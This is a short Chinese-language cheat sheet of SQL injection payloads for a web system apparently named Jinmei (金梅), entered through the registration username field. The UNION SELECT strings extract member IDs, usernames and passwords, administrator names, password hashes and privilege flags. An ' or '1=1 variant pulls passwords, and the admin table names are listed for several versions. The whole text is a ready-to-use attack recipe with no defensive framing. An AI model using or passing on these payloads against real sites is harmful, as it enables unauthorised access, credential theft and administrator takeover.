方法1
得注册用户名:
lamianbu 'union select userid from users where oklook=3 or '0
oklook=x
0游1普2白3黄4钻(4手5钻)
得密码(可能不对应,所以推荐方法2):
注册用户名处填 用户名' or '1=1
方法2
得用户id为xxx:
lamianbu 'union select id from users where oklook=3 or '0
得id对应用户名:
lamianbu 'union select userid from users where id=xxx or '0
得id对应密码:
lamianbu 'union select password from users where id=xxx or '0
得管理员用户名:
lamianbu 'union select name from password where id>=1 or '0
得管理员密码:(金梅4有md5加密,看到的是16位乱码)
lamianbu 'union select pwd from password where id>=1 or '0
表名:金梅4为:fdg85675fd
会员版为:password
有些版本为:okwiantgo
验证管理员权限:
lamianbu 'union select flag from password where id>=1
返回1超,2高,3初,4无